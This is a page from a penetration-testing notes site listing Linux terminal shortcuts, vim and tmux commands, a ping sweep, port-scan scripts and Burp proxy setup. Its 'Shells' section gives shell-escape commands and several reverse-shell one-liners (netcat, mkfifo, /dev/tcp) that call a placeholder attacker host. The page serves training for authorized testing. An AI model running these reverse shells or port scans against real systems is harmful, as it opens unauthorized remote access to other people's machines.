CSbyGB - Pentips
Buy me a tea
  • CS By GB - PenTips
    • Welcome to CSbyGB's Pentips
  • Networking, Protocols and Network pentest
    • Basics
    • DNS
    • FTP
    • HTTP & HTTPS
    • IMAP
    • IPMI
    • MSSQL
    • MYSQL
    • NFS
    • Oracle TNS
    • POP3
    • RDP
    • RPC
    • Rservices
    • Rsync
    • SMB
    • SMTP
    • SNMP
    • SSH
    • VOIP and related protocols
    • Winrm
    • WMI
    • Useful tips when you find unknown ports
  • Ethical Hacking - General Methodology
    • Introduction
    • Information Gathering
    • Scanning & Enumeration
    • Exploitation (basics)
    • Password Attacks
    • Post Exploitation
    • Lateral Movement
    • Proof-of-Concept
    • Post-Engagement
    • MITRE ATT&CK
  • External Pentest
    • External Pentest
  • Web Pentesting
    • Introduction to HTTP and web
    • Enumeration
    • OWASP Top 10
    • General Methodo & Misc Tips
    • Web Services and API
    • Vunerabilities and attacks
      • Clickjacking
      • CORS (Misconfigurations)
      • CSRF
      • SSRF
      • Bypass captcha
      • Template Injection (client and server side)
      • MFA bypass
      • XXE
    • Exposed git folder
    • Docker exploitation and Docker vulnerabilities
    • Websockets
  • Mobile App Pentest
    • Android
    • IOS
  • Wireless Pentest
    • Wireless pentest
  • Cloud Pentest
    • Cloud Pentest
    • Google Cloud Platform
    • AWS
  • Thick Client Pentest
    • Thick Client
  • Hardware Pentest
    • ATM
    • IoT
  • Secure Code Review
    • Secure code review
    • Java notes for Secure Code Review
  • AI & AI Pentest
    • MITRE ATLAS
    • OWASP ML and LLM
    • Hugging face
    • AI Python
    • Gemini
    • Ollama
  • Checklist
    • Web Application and API Pentest Checklist
    • Linux Privesc Checklist
    • Mobile App Pentest Checklist
  • Tools
    • Burpsuite
    • Android Studio
    • Frida
    • CrackMapExec
    • Netcat and alternatives
    • Nmap
    • Nuclei
    • Evil Winrm
    • Metasploit
    • Covenant
    • Mimikatz
    • Passwords, Hashes and wordlist tools
    • WFuzz
    • WPScan
    • Powershell Empire
    • Curl
    • Vulnerability Scanning tools
    • Payload Tools
    • Out of band Servers
    • STEWS
    • Webcrawlers
    • Websocat
  • VM and Labs
    • General tips
    • Setup your pentest lab
  • Linux
    • Initial Foothold
    • Useful commands and tools for pentest on Linux
    • Privilege Escalation
      • Kernel Exploits
      • Password and file permission
      • Sudo
      • SUID
      • Capabilities
      • Scheduled tasks
      • NFS Root Squashing
      • Services
      • PATH Abuse
      • Wildcard Abuse
      • Privileged groups
      • Exploit codes Cheat Sheet
  • Windows
    • Offensive windows
    • Enumeration and general Win tips
    • Privilege Escalation
    • Active Directory
    • Attacking Active Directory
      • LLMNR Poisoning
      • SMB Relay Attacks
      • Shell Access
      • IPv6 Attacks
      • Passback Attacks
      • Abusing ZeroLogon
    • Post-Compromise Enumeration
      • Powerview or SharpView (.NET equivalent)
      • AD Manual Enumeration
      • Bloodhound
      • Post Compromise Enumeration - Resources
    • Post Compromise Attacks
      • Pass the Password / Hash
      • Token Impersonation - Potato attacks
      • Kerberos
      • GPP/cPassword Attacks
      • URL File Attack
      • PrintNightmare
      • Printer Bug
      • AutoLogon exploitation
      • Always Installed Elevated exploitation
      • UAC Bypass
      • Abusing ACL
      • Unconstrained Delegation
    • Persistence
    • AV Evasion
    • Weaponization
    • Useful commands in Powershell, CMD and Sysinternals
    • Windows Internals
  • Programming
    • Python programming
    • My scripts
    • Kotlin
  • Binary Exploitation
    • Assembly
    • Buffer Overflow - Stack based - Winx86
    • Buffer Overflow - Stack based - Linux x86
  • OSINT
    • OSINT
    • Create an OSINT lab
    • Sock Puppets
    • Search engines
    • OSINT Images
    • OSINT Email
    • OSINT Password
    • OSINT Usernames
    • OSINT People
    • OSINT Social Media
    • OSINT Websites
    • OSINT Business
    • OSINT Wireless
    • OSINT Tools
    • Write an OSINT report
  • Pentester hardware toolbox
    • Flipper Zero
    • OMG cables
    • Rubber ducky
  • Post Exploitation
    • File transfers between target and attacking machine
    • Maintaining Access
    • Pivoting
    • Cleaning up
  • Reporting
    • How to report your findings
  • Red Team
    • Red Team
    • Defenses Enumeration
    • AV Evasion
  • Writeups
    • Hackthebox Tracks
      • Hackthebox - Introduction to Android Exploitation - Track
    • Hackthebox Writeups
      • Hackthebox - Academy
      • Hackthebox - Access
      • Hackthebox - Active
      • Hackthebox - Ambassador
      • Hackthebox - Arctic
      • Hackthebox - Awkward
      • Hackthebox - Backend
      • Hackthebox - BackendTwo
      • Hackthebox - Bastard
      • Hackthebox - Bastion
      • Hackthebox - Chatterbox
      • Hackthebox - Devel
      • Hackthebox - Driver
      • Hackthebox - Explore
      • Hackthebox - Forest
      • Hackthebox - Good games
      • Hackthebox - Grandpa
      • Hackthebox - Granny
      • Hackthebox - Inject
      • Hackthebox - Jeeves
      • Hackthebox - Jerry
      • Hackthebox - Lame
      • Hackthebox - Late
      • Hackthebox - Love
      • Hackthebox - Mentor
      • Hackthebox - MetaTwo
      • Hackthebox - Monteverde
      • Hackthebox - Nibbles
      • Hackthebox - Optimum
      • Hackthebox - Paper
      • Hackthebox - Photobomb
      • Hackthebox - Poison
      • Hackthebox - Precious
      • Hackthebox - Querier
      • Hackthebox - Resolute
      • Hackthebox - RouterSpace
      • Hackthebox - Sauna
      • Hackthebox - SecNotes
      • Hackthebox - Shoppy
      • Hackthebox - Soccer
      • Hackthebox - Steamcloud
      • Hackthebox - Toolbox
      • Hackthebox - Vault
      • Hackthebox - Updown
    • TryHackme Writeups
      • TryHackMe - Anonymous
      • TryHackMe - Blaster
      • TryHackMe - CMesS
      • TryHackMe - ConvertMyVideo
      • TryHackMe - Corridor
      • TryHackMe - LazyAdmin
      • TryHackMe - Looking Glass
      • TryHackMe - Nahamstore
      • TryHackMe - Overpass3
      • TryHackMe - OWASP Top 10 2021
      • TryHackMe - SimpleCTF
      • TryHackMe - SQL Injection Lab
      • TryHackMe - Sudo Security Bypass
      • TryHackMe - Tomghost
      • TryHackMe - Ultratech
      • TryHackMe - Vulnversity
      • TryHackMe - Wonderland
    • Vulnmachines Writeups
      • Web Labs Basic
      • Web Labs Intermediate
      • Cloud Labs
    • Mobile Hacking Lab
      • Mobile Hacking Lab - Lab - Config Editor
      • Mobile Hacking Lab - Lab - Strings
    • Portswigger Web Security Academy Writeups
      • PS - DomXSS
      • PS - Exploiting vulnerabilities in LLM APIs
    • OWASP projects and challenges writeups
      • OWASP MAS Crackmes
    • Vulnerable APIs
      • Vampi
      • Damn Vulnerable Web Service
      • Damn Vulnerable RESTaurant
    • Various Platforms
      • flAWS 1&2
  • Digital skills
    • How to make a gitbook
    • Marp
    • Linux Tips
    • Docker
    • VSCodium
    • Git Tips
    • Obsidian
  • Durable skills
    • Durable skills wheel/Roue des compétences durables
  • Projects
    • Projects
      • Technical Projects
      • General Projects
  • Talks
    • My Talks about Web Pentest
    • My talks about Android Application hacking
    • Other of my talks and Podcast
  • Resources
    • A list of random resources
Powered by GitBook
On this page
  • Useful shortcuts and hacks to use the terminal quickly
  • cd
  • ls
  • Sudo
  • less
  • tail
  • sort
  • cmp
  • Create an alias
  • Network commands
  • Pingsweep in bash
  • Alternative port scan if nmap unvailable
  • read .db file
  • xclip
  • Install
  • Use
  • Vi or Vim
  • Strings
  • TMUX
  • Which architecture
  • Shells
  • Spawning interactive shells
  • Bash Reverse shell
  • Permissions cheat sheet
  • Explainshell.com
  • Route your scripts through burp
  • Resources
  1. Linux

Useful commands and tools for pentest on Linux

Useful shortcuts and hacks to use the terminal quickly

  • Ctrl+U - clear all the current line from the end to the beginning only if the cursor is at the end of the line. It will basically delete everything before the cursor (meaning it can work if you do not want to clear the whole line)

  • Ctrl+Y - recall the cleared line

  • Ctrl+K - clear all the current line from the beginning to the end only if the cursor is at the beginning of the line. Which will basically delete everything after the cursor ;) (meaning it can work if you do not want to clear the whole line)

  • Ctrl+W - clear the previous word in the current line. For example if you have typed a command like git diff /path/to/some/file and you want to delete just the last parameter to the command, Ctrl+W is very useful.

  • Ctrl+E Ctrl+U - move the cursor to the end of the line and clear all the current line from the end to the beginning.

  • Ctrl+C - cancel the current command line, which implies clear all the current line no matter where the cursor is. (you can't recall the cleared line anymore).

  • Alt+Shift+# - comment the current line, keep it in the history and bring up your prompt on a new line.

  • Alt+Backspace to remove a word from your prompt

  • Ctrl+Shit+C - copy something you previously selected

  • Ctrl+Shit+V - paste something

  • Home or Ctrl+A - Go to the begining of your prompt

  • End or Ctrl+E - Go to the end of your prompt

  • To clear the terminal you can use clear but you can also use CRTL+L

  • Ctrl+shift++ to zoom in your terminal

  • Crtl+- to zoom out

  • If you have a command typed in your prompt and you want to open it with your default editor you can use CTRL+X+E

  • Ctrl+R to reverse search in you previously typed commands

  • !cmd will pull off the last command we used with cmd For example- !cd will pull off last command we used with cd or !ls will pull off last command used with ls

cd

ls

  • Instead of typing ls -l you can use the alias ll

  • Instead of typing ls -la you can use the alias la

Sudo

  • If you typed a command but forgot to sudo it you can use sudo !! to sudo it. Then using Enter or the down arrow you can read the following lines, whe you are done you can just type q

less

  • If you want to read a file but do not want to scroll if it is big you can use less FileName

tail

  • tail FileName will print for you the last lines of a file

sort

  • Will sort the content of a file sort filename

  • Example of possible result file1 file2 differ: char 280, line 18

cmp

  • Will compare files cmp file1 file2

Create an alias

  • If you have a command you use all the time but that is a little long you can use an alias to make it shorter alias mycommand="the command you need" so for example alias crazyls = "ls -al" now when you will type crazyls you will have the result of ls -al

Network commands

  • ifconfig

  • ip a

  • iwconfig wireless connection

  • arp -a

  • ip n

  • ip r

  • route get the routing table

  • ping IP-ADD-OR-HOST check if a host is up

  • netstat

Pingsweep in bash

  • On his course Practical Ethical Hacking Heath Adams shares this script that is really convenient to make an ip sweep.

#!/bin/bash
if [ "$1" == "" ]
then
echo "You forgot an IP address!"
echo "Syntax: ./ipsweep.sh 192.168.1"

else
for ip in `seq 1 254`; do
ping -c 1 $1.$ip | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" &
done
fi
  • To automate this further we could add an nmap script to run on the alive ip found.

Alternative port scan if nmap unvailable

  • Here is an internal port Scanner (credits to Tryhackme - Holo network)

#!/bin/bash
ports=(21 22 53 80 443 3306 8443 8080)
for port in ${ports[@]}; do
timeout 1 bash -c "echo \"Port Scan Test\" > /dev/tcp/1.1.1.1/$port && echo $port is open || /dev/null" 
done
  • Python port scan (credits to Tryhackme - Holo network)

#!/usr/bin/python3
import socket
host = "1.1.1.1"
portList = [21,22,53,80,443,3306,8443,8080]
for port in portList:
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 try:
  s.connect((host,port))
  print("Port ", port, " is open")
 except:
  print("Port ", port, " is closed")
  • netcat nc -zv 192.168.100.1 1-65535

read .db file

  • apt-get install db-util install db-util

  • Show everything that’s in the file database.db db_dump -p database.db

  • List the databases in the file database.db db_dump -l database.db

  • Show only the content of the database mydb in the file database.db db_dump -p -s mydb database.db

xclip

Install

  • sudo apt install xclip

Use

xclip is a tool that can allow you to get any output in you clipboard. Let's say you have a big input to copy and do not want to mess up with the mouse, you can use xclip.

  • cat myverybigfile | xclip -sel clipboard will send the content of myverybigfile to the clipboard

Vi or Vim

  • It can be found preinstalled on many linux systems

  • vim /path/to/file open a file

  • i like insert to enter insert mode

  • x cut char

  • dw cut word

  • dd cut line

  • yw copy word

  • yy copy full line

  • p paste

  • esc to exit insert mode

  • : enter command mode

    • :1 go to line 1

    • :w write and save

    • :q quit

    • :q! quit but not save

    • :wq or ZZ write and quit

Note: it is possible to multiply a command for instance if you want to copy 3 words you can use 3yw

Strings

Strings will print human readable chars of a file. And for a CTF if we are looking for a specific string we can pipe it to grep

  • strings -e l file | grep -i FLAG the -e l will select the encoding l is for 16-bit littleendian

  • strings file is the basic use of the command

TMUX

  • sudo apt install tmux -y install Tmux

  • tmux new -s sessionName create an join a new session

  • ctrl+b d detach a session

  • tmux ls list existing sessions

  • ctrl+b x kill current session

  • tmux a -t sessionName or tmux a -t sessionId join an existing session

  • tmux ctrl+b pageup to scroll and q to leave scroll mode

Which architecture

  • lscpu will tell you if you are 32 or 64

  • uname -m similar but less verbose

Shells

Spawning interactive shells

  • /bin/sh -i execute the shell interpreter specified in the path in interactive mode (-i).

  • With Perl

    • perl —e 'exec "/bin/sh";' or from a script perl: exec "/bin/sh";

  • With Ruby

    • ruby: exec "/bin/sh" has to be run from a script

  • With Lua

    • lua: os.execute('/bin/sh') has to be run from a script

  • With awk

    • awk 'BEGIN {system("/bin/sh")}'

  • With Find

    • find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;

    • find . -exec /bin/sh \; -quit This use of the find command uses the execute option (-exec) to initiate the shell interpreter directly. If find can't find the specified file, then no shell will be attained.

  • With vim

    • vim -c ':!/bin/sh'

    • Vim Escape

vim
:set shell=/bin/sh
:shell

Source HTB Academy

Bash Reverse shell

  • Say we have a way through root and we need to get a reverse shell here are helpfuls command

    • rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc IP-OF-YOUR-KALI 7777 > /tmp/f serve a Bash shell on a network socket utilizing a Netcat listener.

    • /bin/bash -i >& /dev/tcp/IP-OF-YOUR-KALI/4444 0>&1

    • nc IP-OF-YOUR-KALI 4444 –e /bin/bash

    • nc IP-OF-YOUR-KALI 4444 –e /bin/sh

    • bash -c 'bash -i >& /dev/tcp/IP-OF-YOUR-KALI/4444 0>&1' this one is symbol safe it is useful when doing it in an url or something like this.

Note: We have to set a listener prior to this with rlwrap nc -lvp 4444

Permissions cheat sheet

Explainshell.com

Route your scripts through burp

  • export https_proxy=http://server-ip:port/ for example export https_proxy=http://127.0.0.1:8080/

  • You will need to add a cert

    • Generate a burp.der cert

    • Convert it to pem openssl x509 -inform der -in burp.der -out burp.pem

    • Install Burp certificate:

      • cp burp.pem /etc/ssl/certs/ (will need sudo if not root)

      • update-ca-certificates (will need sudo if not root)

      • cp burp.pem burp.crt

      • sudo cp burp.crt /usr/local/share/ca-certificates/

      • sudo cp burp.crt /usr/share/ca-certificates/

  • Everytime you launch a script you should see the traffic in burp

Resources

PreviousInitial FootholdNextPrivilege Escalation

Last updated 2 years ago

Say you were in the directory usr/share/wordlists and then you typed cd to go back home, if you want to go back to the wordlists you can use cd - (this command checks the $OLDPWD variable)

You can also edit your .bashrc file and add your aliases there. This will make them permanent.

is a text editor for writing code or editing linux files.

"tmux is a terminal multiplexer. It lets you switch easily between several programs in one terminal, detach them (they keep running in the background) and reattach them to a different terminal." Learn more about .

there are plenty of options for bash and you can even encode it if you needé

image

Source:

is relly helpful to understand what a specific linux command does. Here is an example with rm -rf file

Vim
Vim cheat sheet
tmux
TMUX Cheat Sheet
Introduction to tmux - IppSec
Here is an amazing website to generate reverse shell
Chmod tutorial by Ryan Morrison
This website
LogoShortcut to clear command line terminalAsk Ubuntu
Shortcut to clear command line terminal
LogoGitHub - andrew-d/static-binaries: Various *nix tools built as statically-linked binariesGitHub
Static Binaries
LogoUpgrading Simple Shells to Fully Interactive TTYsropnop blog
Upgrading Simple Shells to Fully Interactive TTYs
you need to HACK faster!! (Linux Terminal hacks YOU NEED!!) NetworkChuck
exit vim
oldpwd
aliases
image